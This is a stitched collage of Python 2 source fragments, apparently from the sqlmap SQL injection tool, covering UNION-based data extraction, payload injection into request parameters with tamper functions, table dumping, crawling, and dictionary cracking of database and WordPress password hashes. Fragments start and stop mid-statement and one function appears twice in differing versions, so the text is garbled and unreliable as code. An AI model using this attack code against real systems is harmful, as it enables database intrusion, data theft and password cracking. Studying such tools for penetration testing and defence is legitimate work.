(IOError, OSError) as ex: errMsg = "an error occurred while attacking " errMsg += "table dump ('%s')" % getSafeExString(ex) logger.critical(errMsg) conf.dumper.dbTableValues(kb.data.dumpedTable) except SqlmapConnectionException as ex: errMsg = "connection exception detected in dumping phase " errMsg += "('%s')" % getSafeExString(ex) logger.critical(errMsg) finally: kb.dumpColumns = None kb.dumpTable = None
def unionUse(expression, unpack=True, dump=False): """ This function tests for an inband SQL injection on the target url then call its subsidiary function to effectively perform an inband SQL injection on the affected url """ initTechnique(PAYLOAD.TECHNIQUE.UNION) abortedFlag = False count = None origExpr = expression startLimit = 0 stopLimit = None value = None width = getConsoleWidth() start = time.time() _, _, _, _, _, expressionFieldsList, expressionFields, _ = agent.getFields(origExpr) if expressionFieldsList and len(expressionFieldsList) > 1 and " ORDER BY " in expression.upper(): # No need for it in multicolumn dumps (one row is retrieved per request) and just slowing down on large table dumps expression = expression[:expression.upper().rindex(" ORDER BY ")] # We have to check if the SQL query might return multiple entries # and in such case forge the SQL limiting the query output one # entry per time # NOTE: I assume that only queries that get data from a table can # return multiple entries if (kb.injection.data[PAYLOAD.TECHNIQUE.UNION].where == PAYLOAD.WHERE.NEGATIVE or \ (dump and (conf.limitStart or conf.limitStop))) and \ " FROM " in expression.upper() and ((Backend.getIdentifiedDbms() \ not in FROM_DUMMY_TABLE) or (Backend.getIdentifiedDbms() in FROM_DUMMY_TABLE \ and not expression.upper().endswith(FROM_DUMMY_TABLE[Backend.getIdentifiedDbms()]))) \ and not re.search(SQL_SCALAR_REGEX, expression, re.I): limitRegExp = re.search(queries[Backend.getIdentifiedDbms()].limitregexp.query, expression, re.I) topLimit = re.search("TOP\s+([\d]+)\s+", expression, re.I) if limitRegExp or (Backend.getIdentifiedDbms() in (DBMS.MSSQL, DBMS.SYBASE) and topLimit): if Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL): limitGroupStart = queries[Backend.getIdentifiedDbms()].limitgroupstart.query limitGroupStop = queries[Backend.getIdentifiedDbms()].limitgroupstop.query if limitGroupStart.isdigit(): startLimit = int(limitRegExp.group(int(limitGroupStart))) stopLimit = limitRegExp.group(int(limitGroupStop)) limitCond = int(stopLimit) > 1 elif Backend.getIdentifiedDbms() in (DBMS.MSSQL, DBMS.SYBASE): if limitRegExp: limitGroupStart = queries[Backend.getIdentifiedDbms()].limitgroupstart.query limitGroupStop = queries[Backend.getIdentifiedDbms()].limitgroupstop.query if limitGroupStart.isdigit(): startLimit = int(limitRegExp.group(int(limitGroupStart))) stopLimit = limitRegExp.group(int(limitGroupStop)) limitCond = int(stopLimit) > 1 elif topLimit: startLimit = 0 stopLimit = int(topLimit.group(1)) limitCond = int(stopLimit) > 1 elif Backend.isDbms(DBMS.ORACLE): limitCond = False else: limitCond = True # I assume that only queries NOT containing a "LIMIT #, 1" # (or similar depending on the back-end DBMS) can return # multiple entries if limitCond: if limitRegExp: stopLimit = int(stopLimit) # From now on we need only the expression until the " LIMIT " # (or similar, depending on the back-end DBMS) word if Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL): stopLimit += startLimit untilLimitChar = expression.index(queries[Backend.getIdentifiedDbms()].limitstring.query) expression = expression[:untilLimitChar] elif Backend.getIdentifiedDbms() in (DBMS.MSSQL, DBMS.SYBASE): stopLimit += startLimit elif dump: if conf.limitStart: startLimit = conf.limitStart - 1 if conf.limitStop: stopLimit = conf.limitStop # Count the number of SQL query entries output countedExpression = expression.replace(expressionFields, queries[Backend.getIdentifiedDbms()].count.query % '*', 1) if " ORDER BY " in countedExpression.upper(): _ = countedExpression.upper().rindex(" ORDER BY ") countedExpression = countedExpression[:_] output = __oneShotUnionUse(countedExpression, unpack) count = parseUnionPage(output) if isNumPosStrValue(count): if isinstance(stopLimit, int) and stopLimit > 0: stopLimit = min(int(count), int(stopLimit)) else: stopLimit = int(count) infoMsg = "the SQL query used returns " infoMsg += "%d entries" % stopLimit logger.info(infoMsg) elif count and (not isinstance(count, basestring) or not count.isdigit()): warnMsg = "it was not possible to count the number " warnMsg += "of entries for the SQL query provided. " warnMsg += "sqlmap will assume that it returns only " warnMsg += "one entry" logger.warn(warnMsg) stopLimit = 1 elif not count or int(count) == 0: if not count: warnMsg = "the SQL query provided does not " warnMsg += "return any output" logger.warn(warnMsg) else: value = [] # for empty tables return value threadData = getCurrentThreadData() threadData.shared.limits = iter(xrange(startLimit, stopLimit)) numThreads = min(conf.threads, (stopLimit - startLimit)) threadData.shared.value = BigArray() if stopLimit > TURN_OFF_RESUME_INFO_LIMIT: kb.suppressResumeInfo = True debugMsg = "suppressing possible resume console info because of " debugMsg += "large number of rows. It might take too long" logger.debug(debugMsg) try: def unionThread(): threadData = getCurrentThreadData() while kb.threadContinue: with kb.locks.limits: try: num = threadData.shared.limits.next() except StopIteration: break if Backend.getIdentifiedDbms() in (DBMS.MSSQL, DBMS.SYBASE): field = expressionFieldsList[0] elif Backend.isDbms(DBMS.ORACLE): field = expressionFieldsList else: field = None limitedExpr = agent.limitQuery(num, expression, field) output = __oneShotUnionUse(limitedExpr, unpack, True) if not kb.threadContinue: break if output: if all(map(lambda x: x in output, [kb.chars.start, kb.chars.stop])): items = parseUnionPage(output) if isNoneValue(items): continue with kb.locks.value: for item in arrayizeValue(items): threadData.shared.value.append(item) else: items = output.replace(kb.chars.start, "").replace(kb.chars.stop, "").split(kb.chars.delimiter) if conf.verbose == 1 and not (threadData.resumed and kb.suppressResumeInfo): status = "[%s] [INFO] %s: %s" % (time.strftime("%X"), "resumed" if threadData.resumed else "retrieved", safecharencode(",".join("\"%s\"" % _ for _ in flattenValue(arrayizeValue(items))))) if len(status) > width: status = "%s..." % status[:width - 3] dataToStdout("%s\r\n" % status, True) runThreads(numThreads, unionThread) if conf.verbose == 1: clearConsoleLine(True) except KeyboardInterrupt: abortedFlag = True warnMsg = "user aborted during enumeration. sqlmap " warnMsg += "will display partial output" logger.warn(warnMsg) finally: value = threadData.shared.value kb.suppressResumeInfo = False if not value and not abortedFlag: expression = re.sub("\s*ORDER BY\s+[\w,]+", "", expression, re.I) # full inband doesn't play well with ORDER BY value = __oneShotUnionUse(expression, unpack) duration = calculateDeltaSeconds(start) if not kb.bruteMode: debugMsg = "performed %d queries in %d seconds" % (kb.counters[PAYLOAD.TECHNIQUE.UNION], duration) logger.debug(debugMsg) return value
get += "%s%s=%s" % (delimiter, name, value) elif cookie is not None: cookie += "%s%s=%s" % (conf.cookieDel or DEFAULT_COOKIE_DELIMITER, name, value) if not conf.skipUrlEncode: get = urlencode(get, limit=True) if post is not None: if place not in (PLACE.POST, PLACE.CUSTOM_POST) and hasattr(post, UNENCODED_ORIGINAL_VALUE): post = getattr(post, UNENCODED_ORIGINAL_VALUE) elif kb.postUrlEncode: post = urlencode(post, spaceplus=kb.postSpaceToPlus) if timeBasedCompare: if len(kb.responseTimes) < MIN_TIME_RESPONSES: clearConsoleLine() if conf.tor: warnMsg = "it's highly recommended to avoid usage of switch '--tor' for " warnMsg += "time-based injections because of its high latency time" singleTimeWarnMessage(warnMsg) warnMsg = "[%s] [WARNING] time-based comparison requires " % time.strftime("%X") warnMsg += "larger statistical model, please wait" dataToStdout(warnMsg) while len(kb.responseTimes) < MIN_TIME_RESPONSES: Connect.queryPage(content=True) dataToStdout('.') dataToStdout("\n")
dataToStdout("\r[%s] [INFO] %s" % (time.strftime("%X"), status), True) threadData.shared.deeper = set() threadData.shared.unprocessed = set([conf.url]) logger.info("starting crawler") for i in xrange(conf.crawlDepth): if i > 0 and conf.threads == 1: singleTimeWarnMessage("running in a single-thread mode. This could take a while.") threadData.shared.count = 0 threadData.shared.length = len(threadData.shared.unprocessed) numThreads = min(conf.threads, len(threadData.shared.unprocessed)) logger.info("searching for links with depth %d" % (i + 1)) runThreads(numThreads, crawlThread) clearConsoleLine(True) if threadData.shared.deeper: threadData.shared.unprocessed = set(threadData.shared.deeper) else: break except KeyboardInterrupt: warnMsg = "user aborted during crawling. sqlmap " warnMsg += "will use partial list" logger.warn(warnMsg) finally: clearConsoleLine(True) if not threadData.shared.outputs: warnMsg = "no usable links found (with GET parameters)"
def queryPage(value=None, place=None, content=False, getRatioValue=False, silent=False, method=None, timeBasedCompare=False, noteResponseTime=True, auxHeaders=None, response=False, raise404=None, removeReflection=True): """ This method calls a function to get the target url page content and returns its page MD5 hash or a boolean value in case of string match check ('--string' command line parameter) """ if conf.direct: return direct(value, content) get = None post = None cookie = None ua = None referer = None host = None page = None pageLength = None uri = None code = None if not place: place = kb.injection.place or PLACE.GET raise404 = place != PLACE.URI if raise404 is None else raise404 value = agent.adjustLateValues(value) payload = agent.extractPayload(value) threadData = getCurrentThreadData() if payload: if kb.tamperFunctions: for function in kb.tamperFunctions: payload, auxHeaders = function(payload=payload, headers=auxHeaders) value = agent.replacePayload(value, payload) logger.log(CUSTOM_LOGGING.PAYLOAD, safecharencode(payload)) if place in (PLACE.GET, PLACE.POST, PLACE.URI, PLACE.CUSTOM_POST): # payloads in GET and/or POST need to be urlencoded # throughly without safe chars (especially & and =) # addendum: as we support url encoding in tampering # functions therefore we need to use % as a safe char if place != PLACE.URI or ( value and payload and '?' in value and value.find('?') < value.find(payload)): payload = urlencode( payload, '%', False, True ) if not place in (PLACE.POST, PLACE.CUSTOM_POST ) and conf.skipUrlEncode else payload value = agent.replacePayload(value, payload) elif place == PLACE.SOAP: # payloads in SOAP should have chars > and < replaced # with their HTML encoded counterparts payload = payload.replace('>', ">").replace('<', "<") value = agent.replacePayload(value, payload) if place: value = agent.removePayloadDelimiters(value) if place == PLACE.COOKIE and conf.cookieUrlencode: value = urlEncodeCookieValues(value) if conf.checkPayload: checkPayload(value) if PLACE.GET in conf.parameters: get = conf.parameters[ PLACE.GET] if place != PLACE.GET or not value else value if PLACE.POST in conf.parameters: post = conf.parameters[ PLACE.POST] if place != PLACE.POST or not value else value if PLACE.CUSTOM_POST in conf.parameters: post = conf.parameters[PLACE.CUSTOM_POST].replace( CUSTOM_INJECTION_MARK_CHAR, "") if place != PLACE.CUSTOM_POST or not value else value if PLACE.SOAP in conf.parameters: post = conf.parameters[ PLACE.SOAP] if place != PLACE.SOAP or not value else value if PLACE.COOKIE in conf.parameters: cookie = conf.parameters[ PLACE.COOKIE] if place != PLACE.COOKIE or not value else value if PLACE.USER_AGENT in conf.parameters: ua = conf.parameters[ PLACE. USER_AGENT] if place != PLACE.USER_AGENT or not value else value if PLACE.REFERER in conf.parameters: referer = conf.parameters[ PLACE. REFERER] if place != PLACE.REFERER or not value else value if PLACE.HOST in conf.parameters: host = conf.parameters[ PLACE.HOST] if place != PLACE.HOST or not value else value if PLACE.URI in conf.parameters: uri = conf.url if place != PLACE.URI or not value else value else: uri = conf.url if conf.rParam: def _randomizeParameter(paramString, randomParameter): retVal = paramString match = re.search("%s=(?P<value>[^&;]+)" % randomParameter, paramString) if match: origValue = match.group("value") retVal = re.sub( "%s=[^&;]+" % randomParameter, "%s=%s" % (randomParameter, randomizeParameterValue(origValue)), paramString) return retVal for randomParameter in conf.rParam: for item in (PLACE.GET, PLACE.POST, PLACE.COOKIE): if item in conf.parameters: if item == PLACE.GET and get: get = _randomizeParameter(get, randomParameter) elif item == PLACE.POST and post: post = _randomizeParameter(post, randomParameter) elif item == PLACE.COOKIE and cookie: cookie = _randomizeParameter( cookie, randomParameter) if conf.evalCode: delimiter = conf.pDel or "&" variables = {} originals = {} for item in filter(None, (get, post)): for part in item.split(delimiter): if '=' in part: name, value = part.split('=', 1) evaluateCode("%s='%s'" % (name, value), variables) originals.update(variables) evaluateCode(conf.evalCode, variables) for name, value in variables.items(): if name != "__builtins__" and originals.get(name, "") != value: if isinstance(value, (basestring, int)): value = unicode(value) if '%s=' % name in (get or ""): get = re.sub( "((\A|\W)%s=)([^%s]+)" % (name, delimiter), "\g<1>%s" % value, get) elif '%s=' % name in (post or ""): post = re.sub( "((\A|\W)%s=)([^%s]+)" % (name, delimiter), "\g<1>%s" % value, post) elif post: post += "%s%s=%s" % (delimiter, name, value) else: get += "%s%s=%s" % (delimiter, name, value) get = urlencode(get, limit=True) if post: if conf.skipUrlEncode is None: _ = (post or "").strip() if _.startswith("<") and _.endswith(">"): msg = "provided POST data looks " msg += "like it's in XML format. " msg += "Do you want to turn off URL encoding " msg += "which is usually causing problems " msg += "in this kind of situations? [Y/n]" conf.skipUrlEncode = readInput(msg, default="Y").upper() != "N" if place not in (PLACE.POST, PLACE.SOAP, PLACE.CUSTOM_POST) and hasattr( post, UNENCODED_ORIGINAL_VALUE): post = getattr(post, UNENCODED_ORIGINAL_VALUE) elif not conf.skipUrlEncode and place not in (PLACE.SOAP, ): post = urlencode(post) if timeBasedCompare: if len(kb.responseTimes) < MIN_TIME_RESPONSES: clearConsoleLine() if conf.tor: warnMsg = "it's highly recommended to avoid usage of switch '--tor' for " warnMsg += "time-based injections because of its high latency time" singleTimeWarnMessage(warnMsg) warnMsg = "time-based comparison needs larger statistical " warnMsg += "model. Making a few dummy requests, please wait.." singleTimeWarnMessage(warnMsg) while len(kb.responseTimes) < MIN_TIME_RESPONSES: Connect.queryPage(content=True) deviation = stdev(kb.responseTimes) if deviation > WARN_TIME_STDEV: kb.adjustTimeDelay = False warnMsg = "there is considerable lagging " warnMsg += "in connection response(s). Please use as high " warnMsg += "value for option '--time-sec' as possible (e.g. " warnMsg += "%d or more)" % (conf.timeSec * 2) logger.critical(warnMsg) elif not kb.testMode: warnMsg = "it is very important not to stress the network adapter's " warnMsg += "bandwidth during usage of time-based queries" singleTimeWarnMessage(warnMsg) if conf.safUrl and conf.saFreq > 0: kb.queryCounter += 1 if kb.queryCounter % conf.saFreq == 0: Connect.getPage(url=conf.safUrl, cookie=cookie, direct=True, silent=True, ua=ua, referer=referer, host=host) start = time.time() if kb.nullConnection and not content and not response and not timeBasedCompare: noteResponseTime = False if kb.nullConnection == NULLCONNECTION.HEAD: method = HTTPMETHOD.HEAD elif kb.nullConnection == NULLCONNECTION.RANGE: if not auxHeaders: auxHeaders = {} auxHeaders[HTTPHEADER.RANGE] = "bytes=-1" _, headers, code = Connect.getPage(url=uri, get=get, post=post, cookie=cookie, ua=ua, referer=referer, host=host, silent=silent, method=method, auxHeaders=auxHeaders, raise404=raise404) if headers: if kb.nullConnection == NULLCONNECTION.HEAD and HTTPHEADER.CONTENT_LENGTH in headers: pageLength = int(headers[HTTPHEADER.CONTENT_LENGTH]) elif kb.nullConnection == NULLCONNECTION.RANGE and HTTPHEADER.CONTENT_RANGE in headers: pageLength = int( headers[HTTPHEADER.CONTENT_RANGE] [headers[HTTPHEADER.CONTENT_RANGE].find('/') + 1:]) if not pageLength: page, headers, code = Connect.getPage( url=uri, get=get, post=post, cookie=cookie, ua=ua, referer=referer, host=host, silent=silent, method=method, auxHeaders=auxHeaders, response=response, raise404=raise404, ignoreTimeout=timeBasedCompare) if conf.secondOrder: page, headers, code = Connect.getPage( url=conf.secondOrder, cookie=cookie, ua=ua, silent=silent, auxHeaders=auxHeaders, response=response, raise404=False, ignoreTimeout=timeBasedCompare, refreshing=True) threadData.lastQueryDuration = calculateDeltaSeconds(start) kb.originalCode = kb.originalCode or code if kb.testMode: kb.testQueryCount += 1 if timeBasedCompare: return wasLastRequestDelayed() elif noteResponseTime: kb.responseTimes.append(threadData.lastQueryDuration) if not response and removeReflection: page = removeReflectiveValues(page, payload) kb.maxConnectionsFlag = re.search(r"max.+connections", page or "", re.I) is not None kb.permissionFlag = re.search( r"(command|permission|access)\s*(was|is)?\s*denied", page or "", re.I) is not None if content or response: return page, headers if getRatioValue: return comparison(page, headers, code, getRatioValue=False, pageLength=pageLength), comparison( page, headers, code, getRatioValue=True, pageLength=pageLength) elif pageLength or page: return comparison(page, headers, code, getRatioValue, pageLength) else: return False
def _bruteProcessVariantB(user, hash_, kwargs, hash_regex, suffix, retVal, found, proc_id, proc_count, wordlists, custom_wordlist): if IS_WIN: coloramainit() count = 0 rotator = 0 wordlist = Wordlist(wordlists, proc_id, getattr(proc_count, "value", 0), custom_wordlist) try: for word in wordlist: if found.value: break current = __functions__[hash_regex](password=word, uppercase=False, **kwargs) count += 1 if not isinstance(word, basestring): continue if suffix: word = word + suffix try: if hash_ == current: if hash_regex == HASH.ORACLE_OLD: # only for cosmetic purposes word = word.upper() retVal.put((user, hash_, word)) clearConsoleLine() infoMsg = "\r[%s] [INFO] cracked password '%s'" % (time.strftime("%X"), word) if user and not user.startswith(DUMMY_USER_PREFIX): infoMsg += " for user '%s'\n" % user else: infoMsg += " for hash '%s'\n" % hash_ dataToStdout(infoMsg, True) found.value = True elif (proc_id == 0 or getattr(proc_count, "value", 0) == 1) and count % HASH_MOD_ITEM_DISPLAY == 0: rotator += 1 if rotator >= len(ROTATING_CHARS): rotator = 0 status = 'current status: %s... %s' % (word.ljust(5)[:5], ROTATING_CHARS[rotator]) if not user.startswith(DUMMY_USER_PREFIX): status += ' (user: %s)' % user if not hasattr(conf, "api"): dataToStdout("\r[%s] [INFO] %s" % (time.strftime("%X"), status)) except KeyboardInterrupt: raise except (UnicodeEncodeError, UnicodeDecodeError): pass # ignore possible encoding problems caused by some words in custom dictionaries except Exception, e: warnMsg = "there was a problem while hashing entry: %s (%s). " % (repr(word), e) warnMsg += "Please report by e-mail to %s" % ML logger.critical(warnMsg) except KeyboardInterrupt: pass finally: if hasattr(proc_count, "value"): with proc_count.get_lock(): proc_count.value -= 1
def dictionaryAttack(attack_dict): suffix_list = [""] hash_regexes = [] results = [] for (_, hashes) in attack_dict.items(): for hash_ in hashes: if not hash_: continue hash_ = hash_.split()[0] regex = hashRecognition(hash_) if regex and regex not in hash_regexes: hash_regexes.append(regex) infoMsg = "using hash method: '%s'" % __functions__[regex].func_name logger.info(infoMsg) for hash_regex in hash_regexes: attack_info = [] for (user, hashes) in attack_dict.items(): for hash_ in hashes: if not hash_: continue hash_ = hash_.split()[0] if getCompiledRegex(hash_regex).match(hash_): hash_ = hash_.lower() if hash_regex in (HASH.MYSQL, HASH.MYSQL_OLD, HASH.MD5_GENERIC, HASH.SHA1_GENERIC): attack_info.append([(user, hash_), {}]) elif hash_regex in (HASH.ORACLE_OLD, HASH.POSTGRES): attack_info.append([(user, hash_), {'username': user}]) elif hash_regex in (HASH.ORACLE): attack_info.append([(user, hash_), {'salt': hash_[-20:]}]) elif hash_regex in (HASH.MSSQL, HASH.MSSQL_OLD): attack_info.append([(user, hash_), {'salt': hash_[6:14]}]) elif hash_regex in (HASH.CRYPT_GENERIC): attack_info.append([(user, hash_), {'salt': hash_[0:2]}]) if not attack_info: continue if not kb.wordlist: if hash_regex == HASH.ORACLE_OLD: #it's the slowest of all methods hence smaller default dict message = "what's the dictionary's location? [%s]" % paths.ORACLE_DEFAULT_PASSWD dictpath = readInput(message, default=paths.ORACLE_DEFAULT_PASSWD) else: message = "what's the dictionary's location? [%s]" % paths.WORDLIST dictpath = readInput(message, default=paths.WORDLIST) checkFile(dictpath) infoMsg = "loading dictionary from: '%s'" % dictpath logger.info(infoMsg) kb.wordlist = getFileItems(dictpath, None, False) message = "do you want to use common password suffixes? (slow!) [y/N] " test = readInput(message, default="N") if test[0] in ("y", "Y"): suffix_list += COMMON_PASSWORD_SUFFIXES infoMsg = "starting dictionary attack (%s)" % __functions__[hash_regex].func_name logger.info(infoMsg) for item in attack_info: ((user, _), _) = item kb.wordlist.append(normalizeUnicode(user)) length = len(kb.wordlist) * len(suffix_list) if hash_regex in (HASH.MYSQL, HASH.MYSQL_OLD, HASH.MD5_GENERIC, HASH.SHA1_GENERIC): count = 0 for suffix in suffix_list: if not attack_info: break for word in kb.wordlist: if not attack_info: break count += 1 if suffix: word = word + suffix try: current = __functions__[hash_regex](password = word, uppercase = False) for item in attack_info: ((user, hash_), _) = item if hash_ == current: results.append((user, hash_, word)) clearConsoleLine() infoMsg = "[%s] [INFO] found: '%s'" % (time.strftime("%X"), word) if user and not user.startswith(DUMMY_USER_PREFIX): infoMsg += " for user: '******'\n" % user else: infoMsg += " for hash: '%s'\n" % hash_ dataToStdout(infoMsg, True) attack_info.remove(item) elif count % HASH_MOD_ITEM_DISPLAY == 0 or count == length or hash_regex in (HASH.ORACLE_OLD) or hash_regex == HASH.CRYPT_GENERIC and IS_WIN: status = '%d/%d words (%d%s)' % (count, length, round(100.0*count/length), '%') dataToStdout("\r[%s] [INFO] %s" % (time.strftime("%X"), status)) except KeyboardInterrupt: print warnMsg = "user aborted during dictionary attack phase" logger.warn(warnMsg) return results except: warnMsg = "there was a problem while hashing entry: %s. " % repr(word) warnMsg += "Please report by e-mail to %s." % ML logger.critical(warnMsg) clearConsoleLine() else: for ((user, hash_), kwargs) in attack_info: count = 0 found = False for suffix in suffix_list: if found: break for word in kb.wordlist: current = __functions__[hash_regex](password = word, uppercase = False, **kwargs) count += 1 if suffix: word = word + suffix try: if hash_ == current: if regex == HASH.ORACLE_OLD: #only for cosmetic purposes word = word.upper() results.append((user, hash_, word)) clearConsoleLine() infoMsg = "[%s] [INFO] found: '%s'" % (time.strftime("%X"), word) if user and not user.startswith(DUMMY_USER_PREFIX): infoMsg += " for user: '******'\n" % user else: infoMsg += " for hash: '%s'\n" % hash_ dataToStdout(infoMsg, True) found = True break elif count % HASH_MOD_ITEM_DISPLAY == 0 or count == length or hash_regex in (HASH.ORACLE_OLD) or hash_regex == HASH.CRYPT_GENERIC and IS_WIN: status = '%d/%d words (%d%s)' % (count, length, round(100.0*count/length), '%') if not user.startswith(DUMMY_USER_PREFIX): status += ' (user: %s)' % user dataToStdout("\r[%s] [INFO] %s" % (time.strftime("%X"), status)) except KeyboardInterrupt: print warnMsg = "user aborted during dictionary attack phase" logger.warn(warnMsg) return results except: warnMsg = "there was a problem while hashing entry: %s. " % repr(word) warnMsg += "Please report by e-mail to %s." % ML logger.critical(warnMsg) clearConsoleLine() if len(hash_regexes) == 0: warnMsg = "unknown hash Format. " warnMsg += "Please report by e-mail to %s." % ML logger.warn(warnMsg) if len(results) == 0: warnMsg = "no clear password(s) found" logger.warn(warnMsg) return results
def dictionaryAttack(attack_dict): suffix_list = [""] custom_wordlist = [] hash_regexes = [] results = [] resumes = [] processException = False user_hash = [] for (_, hashes) in attack_dict.items(): for hash_ in hashes: if not hash_: continue hash_ = hash_.split()[0] regex = hashRecognition(hash_) if regex and regex not in hash_regexes: hash_regexes.append(regex) infoMsg = "using hash method '%s'" % __functions__[regex].func_name logger.info(infoMsg) for hash_regex in hash_regexes: keys = set() attack_info = [] for (user, hashes) in attack_dict.items(): for hash_ in hashes: if not hash_: continue hash_ = hash_.split()[0] if re.match(hash_regex, hash_): item = None if hash_regex not in (HASH.CRYPT_GENERIC, HASH.WORDPRESS): hash_ = hash_.lower() if hash_regex in (HASH.MYSQL, HASH.MYSQL_OLD, HASH.MD5_GENERIC, HASH.SHA1_GENERIC): item = [(user, hash_), {}] elif hash_regex in (HASH.ORACLE_OLD, HASH.POSTGRES): item = [(user, hash_), {'username': user}] elif hash_regex in (HASH.ORACLE): item = [(user, hash_), {'salt': hash_[-20:]}] elif hash_regex in (HASH.MSSQL, HASH.MSSQL_OLD): item = [(user, hash_), {'salt': hash_[6:14]}] elif hash_regex in (HASH.CRYPT_GENERIC): item = [(user, hash_), {'salt': hash_[0:2]}] elif hash_regex in (HASH.WORDPRESS): item = [(user, hash_), {'salt': hash_[4:12], 'count': 1<<ITOA64.index(hash_[3]), 'prefix': hash_[:12]}] if item and hash_ not in keys: resumed = hashDBRetrieve(hash_) if not resumed: attack_info.append(item) user_hash.append(item[0]) else: infoMsg = "resuming password '%s' for hash '%s'" % (resumed, hash_) if user and not user.startswith(DUMMY_USER_PREFIX): infoMsg += " for user '%s'" % user logger.info(infoMsg) resumes.append((user, hash_, resumed)) keys.add(hash_) if not attack_info: continue if not kb.wordlists: while not kb.wordlists: # the slowest of all methods hence smaller default dict if hash_regex in (HASH.ORACLE_OLD, HASH.WORDPRESS): dictPaths = [paths.SMALL_DICT] else: dictPaths = [paths.WORDLIST] message = "what dictionary do you want to use?\n" message += "[1] default dictionary file '%s' (press Enter)\n" % dictPaths[0] message += "[2] custom dictionary file\n" message += "[3] file with list of dictionary files" choice = readInput(message, default="1") try: if choice == "2": message = "what's the custom dictionary's location?\n" dictPaths = [readInput(message)] logger.info("using custom dictionary") elif choice == "3": message = "what's the list file location?\n" listPath = readInput(message) checkFile(listPath) dictPaths = getFileItems(listPath) logger.info("using custom list of dictionaries") else: logger.info("using default dictionary") for dictPath in dictPaths: checkFile(dictPath) kb.wordlists = dictPaths except SqlmapFilePathException, msg: warnMsg = "there was a problem while loading dictionaries" warnMsg += " ('%s')" % msg logger.critical(warnMsg) message = "do you want to use common password suffixes? (slow!) [y/N] " test = readInput(message, default="N") if test[0] in ("y", "Y"): suffix_list += COMMON_PASSWORD_SUFFIXES infoMsg = "starting dictionary-based cracking (%s)" % __functions__[hash_regex].func_name logger.info(infoMsg) for item in attack_info: ((user, _), _) = item if user and not user.startswith(DUMMY_USER_PREFIX): custom_wordlist.append(normalizeUnicode(user)) if hash_regex in (HASH.MYSQL, HASH.MYSQL_OLD, HASH.MD5_GENERIC, HASH.SHA1_GENERIC): for suffix in suffix_list: if not attack_info or processException: break if suffix: clearConsoleLine() infoMsg = "using suffix '%s'" % suffix logger.info(infoMsg) retVal = None processes = [] try: if _multiprocessing: if _multiprocessing.cpu_count() > 1: infoMsg = "starting %d processes " % _multiprocessing.cpu_count() singleTimeLogMessage(infoMsg) retVal = _multiprocessing.Queue() count = _multiprocessing.Value('i', _multiprocessing.cpu_count()) for i in xrange(_multiprocessing.cpu_count()): p = _multiprocessing.Process(target=_bruteProcessVariantA, args=(attack_info, hash_regex, suffix, retVal, i, count, kb.wordlists, custom_wordlist)) processes.append(p) for p in processes: p.start() for p in processes: p.join() else: warnMsg = "multiprocessing hash cracking is currently " warnMsg += "not supported on this platform" singleTimeWarnMessage(warnMsg) retVal = Queue() _bruteProcessVariantA(attack_info, hash_regex, suffix, retVal, 0, 1, kb.wordlists, custom_wordlist) except KeyboardInterrupt: print processException = True warnMsg = "user aborted during dictionary-based attack phase (Ctrl+C was pressed)" logger.warn(warnMsg) for process in processes: try: process.terminate() process.join() except OSError: pass finally: if retVal: conf.hashDB.beginTransaction() while not retVal.empty(): user, hash_, word = item = retVal.get(block=False) attack_info = filter(lambda _: _[0][0] != user or _[0][1] != hash_, attack_info) hashDBWrite(hash_, word) results.append(item) conf.hashDB.endTransaction() clearConsoleLine() else: for ((user, hash_), kwargs) in attack_info: if processException: break if any(_[0] == user and _[1] == hash_ for _ in results): continue count = 0 found = False for suffix in suffix_list: if found or processException: break if suffix: clearConsoleLine() infoMsg = "using suffix '%s'" % suffix logger.info(infoMsg) retVal = None processes = [] try: if _multiprocessing: if _multiprocessing.cpu_count() > 1: infoMsg = "starting %d processes " % _multiprocessing.cpu_count() singleTimeLogMessage(infoMsg) retVal = _multiprocessing.Queue() found_ = _multiprocessing.Value('i', False) count = _multiprocessing.Value('i', _multiprocessing.cpu_count()) for i in xrange(_multiprocessing.cpu_count()): p = _multiprocessing.Process(target=_bruteProcessVariantB, args=(user, hash_, kwargs, hash_regex, suffix, retVal, found_, i, count, kb.wordlists, custom_wordlist)) processes.append(p) for p in processes: p.start() for p in processes: p.join() found = found_.value != 0 else: warnMsg = "multiprocessing hash cracking is currently " warnMsg += "not supported on this platform" singleTimeWarnMessage(warnMsg) class Value(): pass retVal = Queue() found_ = Value() found_.value = False _bruteProcessVariantB(user, hash_, kwargs, hash_regex, suffix, retVal, found_, 0, 1, kb.wordlists, custom_wordlist) found = found_.value except KeyboardInterrupt: print processException = True warnMsg = "user aborted during dictionary-based attack phase (Ctrl+C was pressed)" logger.warn(warnMsg) for process in processes: try: process.terminate() process.join() except OSError: pass finally: if retVal: conf.hashDB.beginTransaction() while not retVal.empty(): user, hash_, word = item = retVal.get(block=False) hashDBWrite(hash_, word) results.append(item) conf.hashDB.endTransaction() clearConsoleLine()
path, os.path.join(root, ifile), msg) logger.error(errMsg) else: # Run doc tests # Reference: http://docs.python.org/library/doctest.html (failure_count, test_count) = doctest.testmod(module) if failure_count > 0: retVal = False count += 1 status = '%d/%d (%d%%) ' % (count, length, round(100.0 * count / length)) dataToStdout("\r[%s] [INFO] complete: %s" % (time.strftime("%X"), status)) clearConsoleLine() if retVal: logger.info("smoke test final result: PASSED") else: logger.error("smoke test final result: FAILED") return retVal def adjustValueType(tagName, value): for family in optDict.keys(): for name, type_ in optDict[family].items(): if type(type_) == tuple: type_ = type_[0] if tagName == name: if type_ == "boolean":
def dumpTable(self, foundData=None): self.forceDbmsEnum() if conf.db is None or conf.db == CURRENT_DB: if conf.db is None: warnMsg = "missing database parameter. sqlmap is going " warnMsg += "to use the current database to enumerate " warnMsg += "table(s) entries" logger.warn(warnMsg) conf.db = self.getCurrentDb() elif conf.db is not None: if Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2, DBMS.HSQLDB): conf.db = conf.db.upper() if ',' in conf.db: errMsg = "only one database name is allowed when enumerating " errMsg += "the tables' columns" raise SqlmapMissingMandatoryOptionException(errMsg) conf.db = safeSQLIdentificatorNaming(conf.db) if conf.tbl: if Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2, DBMS.HSQLDB): conf.tbl = conf.tbl.upper() tblList = conf.tbl.split(",") else: self.getTables() if len(kb.data.cachedTables) > 0: tblList = kb.data.cachedTables.values() if isinstance(tblList[0], (set, tuple, list)): tblList = tblList[0] elif not conf.search: errMsg = "unable to retrieve the tables " errMsg += "in database '%s'" % unsafeSQLIdentificatorNaming(conf.db) raise SqlmapNoneDataException(errMsg) else: return for tbl in tblList: tblList[tblList.index(tbl)] = safeSQLIdentificatorNaming(tbl, True) for 